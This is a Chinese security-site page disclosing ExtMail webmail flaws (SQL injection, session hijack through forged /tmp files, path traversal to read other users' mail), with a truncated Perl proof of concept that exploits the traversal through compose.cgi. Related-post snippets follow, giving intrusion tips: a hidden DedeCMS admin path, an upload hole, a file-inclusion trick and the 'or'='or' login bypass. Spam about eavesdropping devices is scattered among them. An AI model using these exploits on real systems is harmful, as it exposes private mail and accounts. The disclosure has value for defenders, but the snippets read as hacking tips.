建站极客
网络安全 漏洞分析 正文
对Extmail安全漏洞的分析
所属分类:
网络安全 / 漏洞分析
阅读数:
237
收藏 0
赞 0
分享
漏洞说明:ExtMail Project 是一个活跃的开源邮件系统项目,目前由ExtMail 团队维护。该项于2005年9月18日正式启动,最初以WebMail软件为主,至今已逐步形成了ExtMail软件系列。整个项目的目标是开发出高效、 易用、富有生命力的邮件系统(方案),经过粗略的统计,截止2007年6月份,已有超过3000个服务器在运行ExtMail软件,其中有超过1000个 运行在互联网上。Webmail采取perl语言CGI方式编写,国内众多知名站点均使用extmail,譬如 http://mail.csdn.net。80sec在其产品中发现安全漏洞,包括SQL注射,任意用户身份劫持,以及任意信件读取的几个重大安全漏 洞。
漏洞厂商:http://www.extmail.org/
漏洞解析:
1 SQL注射漏洞
程序在处理用户登陆参数的地方没有对SQL注射进行防护,导致可能产生SQL注射漏洞,该处没有回显,但是利用延迟技术,一样可以进行敏感信息获取
2 任意用户身份获取漏洞
程序在处理全局用户参数提交时产生错误,导致匿名用户可以在该会话期间内上传文件到/tmp/目录,而程序的所有认证机制都是依靠/tmp/下的文件来处理的,所以匿名用户可以伪造认证文件来窃取其他的用户身份
3 任意信件读取漏洞
程序依靠文件处理系统来区分各个用户和信件,但是程序在处理个别参数的时候存在安全漏洞,导致用户可以跳出目录进入其他人的目录读取敏感信息如信件。
漏洞状态:80sec已经通知官方,但是到目前没有获得任何回复
漏洞证明:80sec发放任意信件读取漏洞的POC
#!/usr/bin/perl
#Exp for Ext-mail
#Codz By 80sec http://www.80sec.com
use LWP;
my $browser = LWP::UserAgent->new;
$mysid="d9a4c4f05aca535d696f8983a23e42bd";
$mytarget="http://www.80sec.com/";
$user='80sec';
$ARGV[0]&&($user=$ARGV[0]);
open(RESULT,”>>$user.txt”);
for($i=0;;$i ) {
my @headers=(’Cookie’=>”sid=$mysid”,’User-Agent’=>’Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’,);
$myresponse=$browser->post(”${mytarget}compose.cgi”,['__mode'=>'edit_forward','folder'=>"Sent/../../../${user}/Maildir",'pos'=>"$i"],@headers);
$myecho=$myresponse->content;
织梦管理系统后台查找 有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。。 这个时候 大家可以尝试下在地址后面加上:/include/dialog/select_media.php?f=form1.murl 但不一定通杀。。
评论 0
收藏 0
赞 0
分享
ckeditor/DesignCms上传漏洞 今天日站发现的.... http://www.xxx.net/manage/Modle/UploadFile/ListFiles.aspx 上传洞洞 上传后没改文件名!可以IIS解析 后面的事,你懂的~ 有点像FCK ... 我晕了...这程式漏洞真多
评论 0
收藏 0
赞 0
分享
DedeCmsV5.6 本地包含又一利用方式 续本地包含 include/arc.datalist.class.php $codefile = (isset($needCode) ? $needCode : $cfg_soft_lang); if(file_exists(DEDEINC.'/code/data
评论 0
收藏 0
赞 0
分享
Discuz X1.5 用不到 Gmail SSL SMTP 前天 16:50 上传 下载附件 (34.22 KB) ,窃听器哪里有卖
设置如上,车辆跟踪器,登入 username 及 password 都再三确认
但用「检测」就弹出以下错误
前天 16:50 上传 下载附件 (12.73 KB)
请问
评论 0
收藏 0
赞 0
分享
万能密码漏洞以及修复 万能密码漏洞以及修复 记得几年前要入侵一个企业网站超级简单 一般只需要找到后台 还有后台通常是www.xxx.com/admin/ 然后账号 密码都是'or'='or' 就进去 现在好像有几个也可以用 但是已经没那么普及了 如果网站还出现这种“
评论 0
收藏 0
赞 0
分享
查看更多